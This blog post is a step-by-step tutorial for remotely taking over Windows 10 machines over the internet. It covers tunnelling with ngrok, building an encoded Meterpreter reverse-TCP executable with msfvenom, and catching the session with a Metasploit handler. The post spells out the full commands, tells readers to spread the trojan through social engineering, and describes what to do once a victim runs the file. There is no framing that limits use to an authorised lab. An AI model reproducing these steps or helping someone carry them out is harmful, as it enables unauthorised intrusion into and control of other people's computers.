Hack Windows 10 Remotely over WAN with Metasploit [No Port Forwarding]

In all of our previous Metasploit or Kali Linux articles, We’re always performing attacks on LAN. Lots of users were asking us how to use Metasploit on the Internet over WAN.

One way is to port forward the router. But today we’ll discuss one more method through which you can easily run Metasploit over WAN without any use of port forwarding because port forwarding is always a challenging task for all of us.

Process –

  1. Create a account on ngrok.com.
  2. Download and Configure the Ngrok package in your Kali Linux machine.
  3. Start the TCP or HTTP service.
  4. Create a payload with Msfvenom
  5. Start the Listener with Metasploit Framework
  6. Spread your Trojan over internet.

Here for 1st and 2nd step, you can check out our previous article where we hacked an Android Device by using Ngrok tunnel. We are skipping the registration and installation part of Ngrok as we already covered in previous article.

After complete installation of Ngrok, start the Ngrok TCP service on port 4444 by typing below command:

Command: ./ngrok tcp 4444

You can use any port but we recommend to use 4444 for this case.

Next step is to create a malicious payload with the help of Msfvenom as follows:

Command: msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_tcp LHOST=<Your Ngrok URL> LPORT=<Your Ngrok Port> -b “\x00” -e x86/shikhata_ga_nai -f exe -o /root/Desktop/<filename>.exe

Here -p stands for payload,
-e stands for encoder,
-o stands for output
-f stands for fileformat

Msfvenom is a combination of Msfpayload and Msfencode, putting both of these tools into a single Framework instance. Msfvenom replaced both msfpayload and msfencode as of June 8th, 2015.

Here is a list of available platforms one can enter when using the –platform switch.

  • Cisco or cisco
  • OSX or osx
  • Solaris or solaris
  • BSD or bsd
  • OpenBSD or openbsd
  • hardware
  • Firefox or firefox
  • BSDi or bsdi
  • NetBSD or netbsd
  • NodeJS or nodejs
  • FreeBSD or freebsd
  • Python or python
  • AIX or aix
  • JavaScript or javascript
  • HPUX or hpux
  • PHP or php
  • Irix or irix
  • Unix or unix
  • Linux or linux
  • Ruby or ruby
  • Java or java
  • Android or android
  • Netware or netware
  • Windows or windows
  • mainframe
  • multi

To view all encoders list, type “msfvenom -l encoders” in your terminal.

When the victim clicks on the gtavicty.exe file, the meterpreter payload will be activated and will look to make a connection back to your system (LHOST). For the connection to succeed, you will need to open the multi-handler in Metasploit to receive the connection.

Start the metasploit framework by typing “msfconsole” in your terminal.

The exploit which we’ll use is “use exploit/multi/handler
Payload is “set payload windows/meterpreter/reverse_tcp

Here you need to set the LHOST and LPORT.

Command: set LHOST 0.0.0.0
Command: set LPORT 4444

Just type “run” in your terminal. Now you can use any social engineering method to spread your malicious executable file over the Internet.

When the victim clicks on your executable file so called as gtavicty.exe, the meterpreter session will be opened instantly.

So here, ngrok will automatically forward all the traffic to your localhost machine. Type “sysinfo” to know more about your target.

To know the process ID, just type “getpid” in same terminal.

You may also like:

Sarcastic Writer

Step by step hacking tutorials about wireless cracking, kali linux, metasploit, ethical hacking, seo tips and tricks, malware analysis and scanning.

Related Posts

This Post Has 2 Comments

Comments are closed.